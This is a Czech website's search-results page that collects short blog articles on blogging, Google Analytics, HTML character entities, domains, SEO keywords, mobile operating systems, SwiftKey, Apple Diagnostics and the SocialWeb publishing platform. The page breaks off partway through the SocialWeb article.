Výsledky vyhledávání v sekci Webové stránky na dotaz reference číslo

Komentáře: jak podpořit čtenáře v přidávání komentářů

access_time13.květen 2019personJana

Dnes se podíváme na komentování na blozích. Komentáře jsou kořením blogu. To, že mohou čtenáři přidávat komentáře, odlišuje blog od ostatních „obyčejných“ webů. V tom je jeho síla. Každý bloger touží po tom, aby jeho příspěvky čtenáři četli. A komunikace se čtenáři je skvělým způsobem, jak zjistit, zda se jim příspěvky líbí, co si o tématu myslí, jaké jsou třeba jejich vlastní zkušenosti a názory. Pro vás to znamená neocenitelnou zpětnou vazbu. A třeba si i najdete nové internetové přátele.Zásada číslo 1: VŽDY ODPOVÍDEJTE NA KOMENTÁŘE! Svých čtenářů a jejich názorů a dotazů si vážíte a tak nelitujte pár minut času a vždy napište alespoň krátkou reakci. I jen jednoduché „Děkuji!“ stojí za to. Blog je totiž hodně o komunikaci – čtenáři poznají, že na blogu to žije, že za ním stojí reálný člověk, kterém záleží na jeho čtenářích. Když uvidí, že si komentářů ceníte a odpovídáte na ně, bude je to motivovat k dalšímu pravidelnému komentování. A to bude motivovat další čtenáře, aby také komentovali! A nezapomeňte na komentáře reagovat co nejrychleji! Pokud necháte komentář bez odpovědi měsíc, je to stejné, jakobyste neodpověděli vůbec.Jak podpořit čtenáře v přidávání komentářů? 1. Napište na konci článku nějakou otázku. Zeptejte se čtenářů, co si o tématu, o kterém píšete, myslí. Nebo je vyzvěte, aby vám napsali své vlastní zkušenosti.2. Pište opravdu hodnotné články. Takové, které obsahují informace, jaké by čtenáři jinde těžko a složitě hledali. Čtenáři budou za informace vděční a napíší vám to.3. Zeptejte se na konci příspvěvku třeba na to, o čem by si chtěli čtenáři přečíst příště4. Pokud s blogem začínáte, zkuste požádat své přátele, aby vám nějaké komentáře přidali. Podpoří to i ostatní, aby se ke komentování přidali5. Přizpůsobte výzvu k vložení komentáře. Na mnoha blogových systémech je napsáno jen „Přidat komentář“ nebo „Leave a Reply“. Víte, že tuto hlášku lze změnit? Buďte originální a napište svou vlastní výzvu pro čtenáře.6. Použijte zajímavý komentář vašeho čtenáře jako základ nového článku. Něco ve stylu „Petr nám napsal: „xxxxx“. To je skvělá otázka a tak si o tom dnes povíme více“7. Udělejte soutěž! Často se na blozích můžete setkat s různými soutěžemi – z angličtiny často označovanými jako „Giveaway“. Soutěž může být o cokoli… Buďte kreativní. Cena nemusí být příliš nákladná. Smyslem soutěže by mělo být, aby čtenáři přidávali k příspěvku se soutěží svůj komentář a ideálně také začali váš blog sledovat pomocí některého sociálního média – Facebooku, Google+, Twitteru apod. Z komentářů poté vylosujete výherce…Pokud nemáte mnoho komentářů, nezoufejte. Určitě se to zlepší. Statistiky říkají, že 90% lidí jen čte články  a nekomentuje. Pouze 10% vašich čtenářů má potřebu vyjádřit se. To je v pořádku. Pokud máte alespoň 1 komentář, alespoň víte, že nejméně 9 dalších lidí článek četlo.Takže jak jste na tom se získáváním komentářů vy? Napište mi komentář!

folder_openPřiřazené štítky

Analýza webu přes Google Analytics

access_time22.březen 2020personRedakce

Dnes se podíváme na nástroj Google Analytics pro majitele internetových stránek. Proč vlastně využívat tento nástroj a v čem je odlišný od ostatních nástrojů pro zjištění návštěvností na webu.Po tvorbě webových stránek se každý zamýšlí nad tím jestli jeho projekt vůbec někdo navštěvuje a když už ano, tak jak dlouho na něm stráví nebo co ho zaujme nejvíce.Hned na začátku je třeba si zaregistrovat účet na Google Analytics. Je to doopravdy jednoduché a snadné. Stlačí navštívit internetovou stránku Googlu a vyplnit požadované informace o Vás a o Vaší internetové stránce.Pro aktivaci Google Analytics je třeba jen webová stránka a čas, který budete věnovat analýze. Po vytvoření účtu na Googlu budete vyzváni k autorizaci Vaší webové stránky a to provedete tak, že přidáte speciální kód od Google na všechny podstránky, které budete chtít sledovat. Zde je nejpodstatnější to, že nemusíte sledovat kompletně všechny stránky ale jen ty, které si sami nadefinujete přidáním kódu.V případě že máte redakční systém tak stačí přidat do tagu ,,head,, indikační číslo, které Vám přidělil Google Analytics. V případě že využíváte html strukturu webových stránek tak přidejte kod na všechny podstránky.V případě, že Vám pro analýzu více vyhovuje čeština tak změnu jazyku můžete provést v nastavení Google Analytics po přihlášení.Analýza webu přes Google AnalyticsObvykle služba Google Analytics má 24 hodiny na zpracování informací, které získal na Vaší webové stránce. Proto po prvním přihlášení neuvidíte žádné informace o návštěvnosti, tudíž se doporučujeme podívat na návštěvnost a začít analýzu webu přes Google Analytics až po několika dnech, kdy budete mít více informací.

folder_openPřiřazené štítky

Jak psát znaky

access_time24.květen 2020personRedakce

Přehled znaků, které zde můžeme použít, už máme, teď by tochtělo ještě vědět, jak je napsat, když nemají svůj čudlík naklávesnici. Jej jich málo, bude to jednoduché.První způsob je prostý. Otevřít si ve windowsech mapuznaků, v ní nastavit svůj font (druh písma) a pak už jen klikatna vybraná písmena, na tlačítko "vybrat" a "kopírovat" a potéCtrl+V (čili "vložit") do textu na místo, kde má znak být. Mocklikání.Další způsob je klávesovými zkratkami. Čili za použitíkombinací kláves, které máme, se písmeno jaksi samo napíše.Třetí způsob je pomocí numerického označení písmene vsystému. Při stisku ALT-GR (nebo chcete-li PRAVÉHO ALTu) se vyťukásprávné číslo (několikamístné) a po uvolnění klávesy alt mámežádaný znak. Doposud jsem mluvila o prostém napsání do textu, čilitřeba do wordu.Nanotebooku mi to ale funguje trochu jinak, protože tam nemámčíselnici, což situaci komplikuje. Když chci napsat číslo, musím hopsát horními klávesami při stisknutém shiftu. Když chci psát pouzečísla, mohu si klávesou FN zaktivovat NUM-LOCK a použít ty klávesys malými modrými čísélky (jenomže pak čísla nemohu kombinovat stextem). Při těchto podmínkách mi uvedené číselné označení fungujepři stisknutí LEVÉHO ALTu. A někdy mohu použít trojhmat FN + ALT +malé modré číslo.Ale když chci napsat totéž do html, mám další možnost. Podobnějako se zapisují barvy (pamatujete? "# + šestimístné číslo") sezapisují i znaky. Jenom numerický zápis v html (neboli num-code) je ve tvaru "&# + několikamístné-číslo + ;",to aby počítač věděl, co si o tom má myslet a že má ukázat danýznak.A pak tu máme ještě "pojmenované znaky" pro nás, pro lidi,protože slova se pamatují lépe než čísla. Čili html-entita je ve tvaru "&# + nějaký-text + ;".Teta Wiki mi řekla (pro lepšízapamatování), že písmena s čárkou mají u sebe "acute" a písmena sháčkem mají u sebe "caron".Příklad: é = é ě = ěPŘEHLED POUŽITELNÝCH ZNAKŮ V TOMTO BLOGU A JAK JE NAPSAT:Záměrně zde vynechávám základní číslice a písmena, která se píšíbez problému přímo (62) a uvádím zde "jiné" znaky (147). Plnozbytečných písmen s ocáskem a na to, co by člověk skutečněpotřeboval, není místo - kdyby si tak šlo vybrat!.Růžově vyznačenézkratky zde nelze použít pro psaní, protože vyvolávají jinoufunkci.Žlutěznaknázev znakuklávesovázkratkanumerickéoznačení(při stiskuALT-GR)num-codehtml-entita!vykřičníkSHIFT + §33&#33; "uvozovkySHIFT + ů38&#38;&quot;#označení číslaCTRL + ALT + x35&#35; $dolar 36&#36; %procentoSHIFT + =37&#37; &ampersandALT-GR + c38&#38;&amp;'apostrof 39&#39; (levá okrouhlá závorkaSHIFT + )40&#40; )pravá okrouhlá závorka 41&#41; *hvězdičkaALT-GR + -42&#42; +plus 43&#43; ,interpunkční čárka 44&#44; -spojovník 45&#45; .tečka 46&#46; /lomítkoSHIFT + ú47&#47; :dvojtečkaSHIFT + .58&#58; ;středník 59&#59; <menší nežALT-GR + ,60&#60;&lt;=rovnítko 61&#61; >větší nežALT-GR + .62&#62;&gt;?otazníkSHIFT + ,63&#63; @komerční atALT-GR + v64&#64; [levá hranatá závorkaALT-GR + f91&#91; \obrácené lomítkoALT-GR + g92&#92; ]pravá hranatá závorkaALT-GR + g93&#93; ^vokáň 94&#94; _čára dole 95&#95; `přízvuk 96&#96; {levá složená závorkaALT-GR + b123&#123; |svislá čáraALT-GR + w124&#124; }pravá složená závorkaALT-GR + n125&#124; ~tilda 126&#125;  tvrdá mezera 2550160&#160;&nbsp;¤měna 2070164&#164;&curren;¦přerušená svislá čára 0166&#166;&brvbar;§paragraf 210167&#167;&sect;©copyright 0169&#169;&copy;«dvojité lomenéuvozovky vlevo 1740171&#171;&laquo;¬logický zápor 1700172&#172;&not;®registrace 0174&#174;&reg;°stupeňSHIFT + ;2480176&#176;&deg;±plus minus 0177&#177;&plusmn;µmikro 0181&#181;&micro;¶odstavec 200182&#182;&para;·tečka uprostřed 0183 &middot;»dvojité lomenéuvozovky vpravo 0187 &raquo;×násobení 1580215 &times;ßmalé ostré s 2250223 &szlig;÷dělení 0247 &divide;–pomlčka šířky n 0150 &ndash;—pomlčka šířky m 0151 &mdash;†kříž 0134 &dagger;‡dvojitý kříž 0135 &Dagger;•černý puntík 0149 &bull;…tři tečky 0133 &hellip;‰promile 0137 &permil;‹levá ostrá závorka 0139 &lsaquo;›pravá ostrá závorka 0155 &rsaquo;€euro 0128 &euro;™obchodní značka 0153 &trade;  

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci SEO a vyhledávače na dotaz reference číslo

Doména pro www stránku jak si správně vybrat

access_time21.březen 2020personRedakce

Podíváme se na to, jak správně si vybrat doménu pro Vaši webovou stránku. Nejdříve co znamená lidsky doména. Doména pro www stránku neboli jméno internetové stránky je označení pro snadné nalezení na internetu. Jestli znáte doménu nějaké webové prezentace, tak stačí jí zadat v prohlížeči a hned se Vám objeví požadovaná stránka. Každá webová stránka má vlastní unikátní doménu. V průběhu tvorby webových stránek by se mělo řádně promyslet jaký název by měla internetová stránka dostat, aby se předešlo zbytečným problémům.Doména musí být jednoducháVybrat doménu Vám pomůže společnost, která se zabývá prodejem domén. Na jejich stránkách máte políčko kam zadáte název a hned se Vám ukáže jestli je doména volná nebo už je obsazená. Před zakoupením jména pro Vaší budoucí internetovou stránku dbejte na to, aby byl název jednoduchý, jednoduše zapamatovatelný a aby nenastal problém ji sdělit klientovi přes telefon. Doména by neměla být zbytečně dlouhá, aby se nemusela zapisovat a byla lehce zapamatovatelná. Použití názvu firmy v doméně je nejlepší způsob jak podtrhnou svojí identitu.Myslete do budoucna při výběru doményV případě že jste menší firma, nezapomínejte na to, že jednou můžete být velká společnost a proto doporučujeme pořídit si nejenom doménu s koncovkou .cz ale i jinou jako je .com .net a další. Důvod je jednoduchý a to ten že v případě, že si budete chtít pořídit stejný název pro Vaší doménu bude obsazena a budete muset zaplatit hodně peněz za odkoupení od člověka, který ji sice nepotřebuje, ale s pomocí Vás si vydělá. V případě že pracujete mezinárodně taktéž doporučujeme si pořídit domény se stejným názvem, ale s koncovkou jiných státu jako například .de pro Německo, .ru pro Rusko a nebo .sk pro Slovensko.Klíčový slova v názvu doményV dnešní době hodně firem zabývající se optimalizací pro vyhledávače Vám doporučí dát si do domény vyhledávající výrazy. My však tuhle metodu nedoporučujeme, firmy které Vám to doporučí si usnadňují za pomocí tohoto tahu práci, ale nenechte se nachytat. Vezmeme to logicky, v doméně je možné použít jen jedno klíčové slovo, ale to předpokládáme, že Vám nestačí. Doména bude zbytečně dlouhá například „nejlevnejsi-ubytovani-v-chorvatku-split.cz“ a proto nebude snadno zapamatovatelná. Ztrácíte místo pro identifikaci Vaši firmy. A nakonec pro optimalizaci pro vyhledávače je to sice výhodnější a dostanete plus u vyhledávače, ale i když použijete klíčový slova v doméně, ve výsledcích nebudete jenom Vy, ale i konkurence přesto že by měla klíčová slova v doméně.Jak správně vymyslet název doményJak jsem již říkal, je lepší, aby byla doména kratší, ale stává se, že do názvu je třeba dát dvě a více slov, proto doporučujeme dávat mezi slova pomlčky usnadňuje to čtení Vaším klientům a snadněji si doménu zapamatují, například pneuservis-stepanek.cz než pneuservisstepanek.cz. Aby se nestalo, že člověk zadá název, bez pomlčky doporučujeme si pořídit doménu i bez ní a nastavit přesměrování.Firmy nabízející nákup doményVybírejte si společnosti, které už jsou dlouho na trhu, levné služby neznamenají vždy kvalitní služby a v tomto případě obzvlášť. Podívejte se na reference, které má daná společnost. Prozkoumejte a zeptejte se na administrační část k doméně, aby byla možnost snadně nastavit email k doméně a změnu DNS záznamu.Vybírejte doménu bez problémů se zákonemPřed vybráním zkontrolujte jestli vybraný název není patentovaní jako třeba Microsoft nebo Apple. Nebyl by to nejlepší výběr.Lhůta platnosti doményNepromeškejte dobu platnosti domény. Doména se většinou kupuje na jeden rok ale můžete samozřejmě koupit i na delší dobu. Musíte být řádně informováni předem od společnosti která má na starosti Vaší doménu o prodloužení, aby se nestalo to že Vám doménu koupí někdo jiný.Přejeme hodně úspěchu při koupi domény. V případě, že by jste potřebovali pomoci při koupi nebo zřízení domény, můžeme vše prokonzultovat.

folder_openPřiřazené štítky

Klíčová slova pro SEO

access_time21.březen 2020personRedakce

Dnes se podíváme na klíčová slova pro SEO, jak je správně vybírat a jak je správně dávat do textu.V dnešní době je vyhledávač nejlepším způsobem pro reklamu a pro prodej Vašich produktů nebo nabídky služeb. Vyhledávač má jednu hlavní výhodu a to tu, že Vám reklamu nenutí. Každý den se setkáváte s reklamou na ulici, v rádiu nebo v televizi, na kterých se neustále něco nabízí, co vy vlastně ani nepotřebujete. Vyhledávač tomuto problému předchází a dává Vám jen tu reklamu před oči, která Vás zajímá. Všelijaká reklama ve vyhledávačích se platí například u Google vychází platba na obrovské peníze třeba i 50 dolarů za jeden klik při velmi konkurenčnímu slovu. Dostáváme se tedy k důležitosti klíčových slov pro optimalizaci webových stránek.Tvorba webových stránek a klíčová slovaPři tvorbě webových stránek se musíte hlavně zamyslet nad výběrem klíčových slov pro Vaší internetovou stránku. Mnohdy se stává, že klient vybírá klíčová slova, provádí se kompletní optimalizace stránky pro vyhledávače, dosahuje TOPu, ale žádný výsledek. Je to proto že jsou špatně zvolena klíčová slova pro SEO, nebo jsou zvolená taková sousloví, která nikdo nevyhledává. Proto si zapamatujte, že je to jeden s nejdůležitějších parametrů pro tvorbu internetových stránek. V případě, že se necítíte na výběr klíčových slov na Vaši internetovu stránku rádi Vám s tím pomůžeme a nabídneme správné řešení pro Váš projekt.K čemu jsou klíčová slovaKlíčová slova potřebujete pro identifikaci Vaší internetové stránky vyhledávačem jako je třeba Google nebo Seznam. S pomocí klíčových slov dáváte najevo na co se zaměřujete, určujete tématiku webové stránky a rozvíjíte svůj projekt. Klíčová slova existují dvojího typu. Velmi konkurenční a méně konkurenční. Rozdíl, jak je vidět z názvu spočívá v konkurenci. V případě že si vybere klíčový výraz, který je často vyhledáván bude více zájemců o to se dostat do TOPu ve vyhledávači, tím pádem konkurence bude obrovská. V případě že si vyberete klíčová slova, která jsou méně vyhledávaná budete mít větší šanci na úspěch.Jak zjistit konkurenci klíčového slovaVyhledávač Google nabízí speciální nástroj na analýzu klíčových slov "Keyword Tools – Google", který Vám umožnuje se podívat jak často se vyhledává daný výraz v období jednoho měsíce. V nástroji máte možnost si nastavit region a jazyk vyhledávání. Čím větší počet vyhledávání klíčového slova za měsíc tím větší konkurence. Ještě jeden způsob jak si analyzovat konkurenci je následující. Přejděte na vyhledávač, který Vás zajímá a zadejte požadované klíčové slovo. První na co si musíte podívat na počet nalezených výsledku čím větší číslo tím větší konkurence. Také se podívejte jaký stránky vyšli jako první, v případě že vyšly všechny první stránky za pomocí úvodní stránky je to známka konkurence. Uspořádaní klíčových slov pro SEO na webuAž si upřesníte klíčová slova pro SEO nesmíte zapomenout na následující postup. Nejpopulárnější slovo, které má největší konkurenci je třeba, aby bylo na úvodní stránce. Hlavní stránka webové prezentace z hlediska optimalizace pro vyhledávače má největší prioritu proto je třeba na ní umístit nejdůležitější klíčové slovo. Na další stránky umístěte méně významná klíčová slova. Jak správně uspořádat klíčová slova na webové stránce bude vysvětleno v dalších článcích na toto téma.

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci Operační systémy a Aplikace na dotaz reference číslo

Android? iOS? Zamčený nebo odemčený OS? Souběžně!

access_time13.květen 2019personRedakce

Občas se v diskuzích objevují zajímavé hádky. Ty máš Android! Tvůj operační systém je otevřený, můžeš instalovat cokoliv. Počkej si na malware! Fuj, iOS! Vždyť to ani není operační systém a všechno musí jít přes AppStore. Jako na dětském pískovišti.Jednou se mne známý ptal jak jako “ten velký liberál” můžu propagovat jakýsi uzavřený operační systém kde o  tom jaké aplikace půjdou nebo nepůjdou spustit rozhoduje jakási autorita z Apple. A o to právě jde. Pokud budeme někomu nutit jakousi “svobodu”, tak se o žádnou svobodu nejedná. Pokud třeba výrobcům zákonem nařídíme vyrábět pouze operační systémy které budou zpracovávat jakýsi otevřený standard, již se jedná o protlačování “svobody” ( svobody výrobce byly právě omezeny ) které svobodné není.Jaké je tedy správné řešení? Pokud se lidem nelíbí uzavřenost operačního systému, dříve nebo později vznikne operační systém který tyto otevřené standardy implementuje dobrovolně. Bude jak plně otevřený tak jeho aplikace nepoběží v sandboxu ale bude moci dělat v systému cokoli.Považujete toto ale skutečně za výhodu? Já si naopak jako iOS developer myslím, že je dobře žekaždá aplikace si v systému již nemůže dělat co chce. Nemusím se tak bát toho, že mi nějaký malware bude vytáčet drahá telefonní čísla, posílat SMS zprávy do zahraničí nebo krást data ( i když tohle už se dá v sandboxu někdy udělat ). Jsem rád, že jsou již pryč doby Symbianu, kde si jisté aplikace samy prodlužovaly licenci tím že každý měsíc poslaly SMS zprávu na premium telefonní číslo. Tyto techniky už dneska nejdou.Otevřený nebo uzavřený operační systém? I na desktopu se časem dočkáme toho, že budeme aplikace nechávat podepisovat a sandboxovat. Jako uživatel bych zvolil operační systém tohoto typu, jako vývojář si pak můžu užívat operačního systému kde mohu skoro všechno. Například Linuxu. Nehádejte se a nechte ty platformy existovat vedle sebe.

folder_openPřiřazené štítky

Instalace jako přežitek počítačů

access_time13.květen 2019personRedakce

Každý známe nějakou instalaci počítačového programu. Nemám na mysli jakékoli zpřístupnění souboru v systému, kdy se ukazuje že se program instaluje, ale instalační proces, kdy jsou rozmísťovány soubory po celém systému. Například na Windows. Uživatel si stáhne instalátor, většinou buďto jako MSI balíček nebo jako samostatný program, který poté otevře. Tento program zapíše do registrů příslušné klíče se záznamy pro budoucí odinstalování programu včetně případných autorunů, asociací přípon pro otevírání v tomto programu a spoustu dalšího. Poté se rozkopíruje do programové složky ( těš se na ten bordel pokud nezvolíš Program Files ) a případně ještě vytvoří své zástupce ve Startu a na ploše. Skvělé. Není zde žádné jednotné interface, vývojáři si své instalátory píší sami.Stejně tak to má i Linux. Zde je více balíčkových systémů, každý ale také svoje data roztahá po systému. Už zde ale je složka /opt , kde mohou být data jedné aplikace pěkně pohromadě. Toto naplňuje přesně možnost číslo jedna, o které se chystám nyní psát.Nejlépe to dělá Apple ve svém systému Mac OS X. Instalaci ze systému úplně vyřadil. Celou aplikaci ( program se zdroji jako obrázky nebo zvuky a další soubory ) jsou zkomprimovány do jednoho balíčku. Po stažení uživatel přesune celý baliček do složky Applications ( většinou je vše v jednom balíčku který po otevření zobrazí ikonu samotného programu a ikonu Applications, takže uživatel jen samotný program jednoduše přetáhne na Applications ) a tím je v podstatě nainstalovaný. Po spuštění odkudkoli program přistupuje do standardizované složky s konfiguračními soubory, kde si ukládá veškeré nastavení a další hodnoty, které si chce pamatovat. Samotný program pak může být samozřejmě při spuštění zakliknutý že se má spouštět při startu, samotný balíček s aplikací pak také můžete kamkoli přesunout.

folder_openPřiřazené štítky

Díky klávesnici SwiftKey budete psát efektivněji

access_time22.květen 2019personRedakce

Klávesnice je velice důležitá funkce v každém dotykovém telefonu. Jediné, co se od nich očekává, je pohodlné, rychlé a bezchybné psaní. Jenže sto lidí, sto chutí a spousta uživatelů si na vestavěnou klávesnici v Apple zařízeních stěžovalo. V iOS 8 vývojáři přidali možnost instalace klávesnicí třetích stran. V Apple Store se tak objevilo hned několik klávesnic na výběr. Jednou z nejpopulárnějších je SwiftKey, která má veliký úspěch především i díky tomu, že je zdarma.Je SwiftKey klávesnice číslo jedna?Klávesnice je v základním motivu velice podobná té základní již přednastavené v iOSu. Avšak na první pohled si ihned všimnete funkce navíc. Tou je „našeptávač“ slov. Aplikace vám jednoduše nabízí slova, která si myslí, že chcete napsat. Pokud používáte i nějaké Android zařízení, nebude to pro vás žádná novinka, jelikož v nejnovějších Androidech je toto součástí základní klávesnice. V základní klávesnici u iOS je tato funkce dostupná pouze při nastaveném anglickém jazyce. Aplikace SwiftKey nám to umožní i v češtině. Další funkci velice známou z androidu je tzv. „swipování“. Jedná se o to, že prstem přejíždíte po jednotlivých písmenek a klávesnice automaticky rozpozná, co chcete napsat.Pokud chcete, aby vaše klávesnice byla originálnější pomocí nějakého motivu, můžete si v aplikaci připlatit od jednoho do dvou eur za další velice líbivé motivy. PohodlnostKdyž si aplikaci nainstalujete a nastavíte si klávesnici SwiftKey jako aktivní, zezačátku občas budete velice naštvaní. Jde o to, že na SwiftKey si musíte nejdříve zvyknout, přibližně prvních deset až dvacet odeslaných zpráv přátelům se budete trápit, ale potom se projeví efektivita aplikace, jelikož klávesnice se od vás učí a velmi brzy vám začne nabízet a upravovat slova přesně tak, jak si přejete.NastaveníV nastavení si můžete nastavit, zda chcete mít zaplou, nebo vyplou autokorekci a hned několik dalších užitečných nastavitelných možností. Avšak já doporučuji mít vše zapnuté, vše je potom jednodušší.Celkový dojemAplikaci jsem si již stáhl dříve, avšak první dojem byl velice špatný, jelikož si klávesnice vše opravovala podle svého a psaní pro mě bylo utrpením. K SwiftKey jsem se nedávno dostal znovu a dal jí ještě jednu šanci. Vydržel jsem počáteční zmatky při psaní a nyní bych už neměnil. Klávesnice nemá chybu a doporučuji ji všem, kteří hledají alternativu pro základní systémovou klávesnici.

folder_openPřiřazené štítky

Jak použít Apple Diagnózu k řešení Mac probémů

access_time22.květen 2019personRedakce

Ve velmi vzácných případech, a to i přes to, že Apple vybírá pouze kvalitní komponenty, se můžeš setkat s boot problémem, grafickým problémem, případně s něčím jiným, co by ti vadilo při práci s Macem. V této krizové situaci hned nemusíš bežet do Apple Store, ale stačí aby si postupoval podle tohoto návodu, který dokáže vyřešit běžné Mac problémy nebo alespoň poukáže na to, co je špatně.1. Odpoj všechna příslušenstvíAby se vyloučily jakékoli problémy s příslušenstvím připojeným k počítači Mac, je třeba nejprve zajistit, aby všechny externí pevné disky, mikrofony, reproduktory a další příslušenství byly odpojeny od počítače. Připojeny nech pouze monitor, myš a klávesnici a můžeš pokračovat.Pokud zjištíš, že tvůj počítač funguje normálně bez jakéhokoli příslušenství, pak připojuj příslušenství jedno po druhém, dokud nenajdeš příslušenství, které je příčinou problému.2. Spusť Apple Hardware TestRestartuj počítač a drž „D“. Budeš automaticky přesměrován na Apple Diagnostiku. Sleduj průběh diagnostiky a na konci si napiš kódy problémů, které můžeš ukázat pracovníkům v Apple Store. Tady můžeš najít seznam reference kódů.3. Klávesové zkratkyExistuje několik klávesových zkratek, které ti ulehčí orientaci při průběhu diagnostiky.Command + G – Zobrazit příručku ZačínámeCommand + L – Zobrazit obrazovku pro výběr jazykaCommand + R – Opětovné spuštění DiagnostikyS – Vypnout MacR – Restartovat MacPozn. při použití restartu nebo vypnutí, může dojít k mírnému zpoždění příkazu.

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci SocialWeb na dotaz reference číslo

Co je SocialWeb? ..vytváření privátních webových sítí.

access_time20.květen 2019personRedakce

SocialWeb není úplně vhodný pro jednotlivce, jejichž zájem je vytvořit si portfólio a nebo jednoduchou webovou prezentaci a to hned z několika důvodů:1. Firemní a nebo osobní webová prezentace se dá lépe postavit například přes WordPress a nebo X online nástrojům (Webnode,Wix….)2. Takový jednotlivci systém SocialWeb zkrátka nevyužijí a pro jiné uživatele systému SocialWeb jejich aktivity jak si povíme níže mají nulovou hodnotu.Takže, SocialWeb zkrátka není určen pro obyčejné uživatele, kteří si chtějí pouze sestavit svou webovou prezentaci a nebo jednoduchý blog.Teď asi nastává otázka pro koho je tedy SocialWeb určen?Víte pro koho je SocialWeb určen?- Marketingové agentury, PR agentury, dokonce i webdesign firmy pro budování microsites.- Pro majitele internetových obchodů pro budování podpůrných tématických webů.- Pro jednotlivce s ambicí stavět a spravovat několik, třeba i desítky webových stránek. Některé ze základních funkcí systému SocialWeb pro tvorbu a správu webových stránek:Vytváření a správa libovolného počtu webových stránek v jednom uživatelském účtu.Správa webhostingů, instalace SSL certifikátů, správa serverů a IP adres zcela automaticky a zdarma.Registrace domén přímo a automaticky z okamžitým nastavením DNS přímo na vám přiřazený server a IP adresu, kdy do několika minut automaticky můžete na zaregistrované doméně stavět web bez žádné akce z vaší strany.Wedos Wapi podpora, kdy můžete SocialWeb využívat jen jako registrační nástroj - tedy, že SocialWeb domény budete registrovat přes váš Wedos účet na vaše fakturační údaje a vše bude fungovat automaticky.Zobrazení a vyhledávání volných domén, SocialWeb monitoruje veškeré expirované domény a následně u nich zjišťuje zda jsou volné, pokud ano, můžete si kteroukoliv volnou expirovanou doménu ihned zaregistrovat, stejně tak můžete ve fulltextu vyhledávat domény, které obsahují konkrétní klíčové slovo. (Nyní je v databázi asi 80 000 CZ volných domén.).Monitoring expirujících domén a roboti pro předregistraci domén, kteří se budou snažit zaregistrovat doménu dříve než spekulanti a nebo jiní roboti za cenu registrace domény (jako alternativa k Daukce.cz, kde pokud doménu chcete, tak jim vlastně o ní řeknete a pak máte možnost si ji vydražit… což mě osobně přišlo vždy jako celkem sprosté.Několik šablon webů, které pak můžete libovolně sestavovat.Tvorba mobilních aplikací.Správa sociálních sítí a účtů, publikace na sociální sítě, plánování publikace…Blog, kategorie, sekce, příspěvky..25 modulů, které lze pro kteroukoliv šablonu použít.Sharelock (zamknutí obsahu, vyžadované sdílení před odemknutím), Agelock (zamknutí obsahu pro návštěvníky mladší X let.Push notifikace, shromažďování uživatelů pro každý z vašich webů, následně rozposílání upozornění v případě vložení nového článku.Pro publikaci automatické generování klíčových slov z obsahu článku (pokud nejsou vyplněny manuálně)Slideshow publikace, Video publikace, YouTube publikace, Publikace na X sociálních sítí, plánování publikace….SEO monitoring a počítání nefunkčních odkazů, kdy systém sleduje všechny URL adresy, které skončili na stránce 404 a management těchto odkazů (přesměrování, BAN…)Automatické opravy nefunkčních odkazů s tím, že se systém snaží najít vhodný článek na základě tagů článků.Kompletní jazykové mutace, weby je možné stavět pro jakoukoliv zem.Tvorba mobilních aplikací…..Slideshow editor (tvorba slideshow pro konkrétní weby)Video editor (stříhání, nahrávání videa i z URL adres) kompilace videa….CSS editor – web staváte na základě nějaké šablony, kdy pak ještě máte možnost šablonu webu překódovat CSS editorem.0% branding, nikde na žádném vašem webu není ani zmínka (ani v řádné URL adrese) o SocialWebu.100% minifikace zdrojového kódu.Možnost stažení zdrojového kódu pro webhosting vašich webů na vašich (Apache,Nginx) serverech.Tvorba a správa emailvých adres pro jakékoliv vaše domény.Vizualizace návštěvnosti a sledování návštěvnostiNewsletter řešení.A další funkce a řešení… Dobře, takže asi chápete, že SocialWeb obsahuje celou řadu nástrojů a funkcí, které komukoliv umožní vytvářet weby, pak je spravovat a také do nich publikovat plus celou řadu nástrojů, které žádná jiná služba nenabízí.Řekněme, že máte firmu a chcete díky SocialWebu vytvořit několik webů, SocialWeb umožňuje kromě výše zmíněných věcí také sestavit si tým, v tomhle ukázkovém případě budou mým týmem tři lidé.Jeden z těchto lidí v týmu se jmenuje Tom a ten také jako jediný umí pracovat se systémem SocialWeb, takže vlastně jeho úkolem a cílem bude celou vaši privátní síť sestavit.- Zaregistruje domény- Vytvoří wwbhostingy- Vytvoří SSL certifikáty- Nastaví PUSH notifikace- Vytvoří weby- Vytvoří a vloží logo pro každý z nich- Vytvoří kategorie a sekce- Sestaví moduly pro každý web- Vytvoří Sociální stránky a účtyTakže Tom vlastně všechno nachystá, pokud vytvoří pouze dvě webové stránky s jednou, která bude přesměrovaná na sekci jiného webu, struktura toho co Tom může nachystat může vypadat třeba takhle:Takže možná již začínáte chápat, že SocialWeb nejsou pouze nástroje pro tvorbu a správu webových stránek, SocialWeb je hlavně koncept vytváření webových sítí.SocialWeb nekonkuruje těm co weby vytváří, online nástrojům pro tvorbu webů, kde máte možnost si vytvořit web a administraci, SocialWeb jsou struktury a vztahy mezi jednotlivými službami a to tak aby všechno bylo maximálně automatizované a jednoduché – tedy aby Tom nepotřeboval znalost programování, zkrátka aby to zvládl téměř každý, tohle je skutečně velmi jednoduchá síť, kterou lze systémem SocialWeb vytvořit, skutečné sítě pak jsou mnohem složitější, sestavené z desítek webů a stovek sociálních účtů a stránek. Teď v týmu máme Janu, ta vůbec neví co je SocialWeb, ani nechápe jak SocialWeb funguje a vlastně to ani nepotřebuje vědět, jejím jediným úkolem je přečíst si zadání a napsat článek, přiložit obrázek (video), zvolit z nabídky sociální sítě a stránky na kterých si přeje tento článek publikovat a vlastně jen kliknout na tlačítko publikovat, to co Jana takto udělá pak vypadá asi tak:Jana dostala úkol publikovat článek na web magazin21.cz na téma Krabičková dieta.Jana článek sepsala a u článku zvolila, že chce tento článek publikovat také na dvou Facebook stránkách, jedné Twitter stránce a do nějaké Pinterest nástěnce.Také u článku zatrhla rozeslat PUSH notifikaci a také rozeslat Email newsletter.Takže zatrhla a sepsala, nic víc dělat nemusela, výsledek?1. Článek byl publikován na web Magazin21.cz do kategorie Hubnutí a styl2. Bylo rozesláno upozornění (PUSH notifikace) všem odběratelům tohoto webu (1013 lidí)3. Byli upozorněni lidé, kteří mají nainstalovanou ios aplikaci webu Magazin21 (800 lidí)4. Byli upozorněni lidé, kteří mají nainstalovanou android aplikaci webu Magazin21 (3200 lidí)5. Bylo odesláno 540 emailů 540 odběratelům newsletteru o novém článku6. Článek byl publikován do Facebook stránky Jíme zdravě (1000 členů)7. Článek byl publikován do Facebook stránky Magazin21 (250 lajků)8. Článek byl publikován do Twitter stránky Magazin21 (250 odběratelů)9. Článek byl publikován na Pinterest, Instagram, 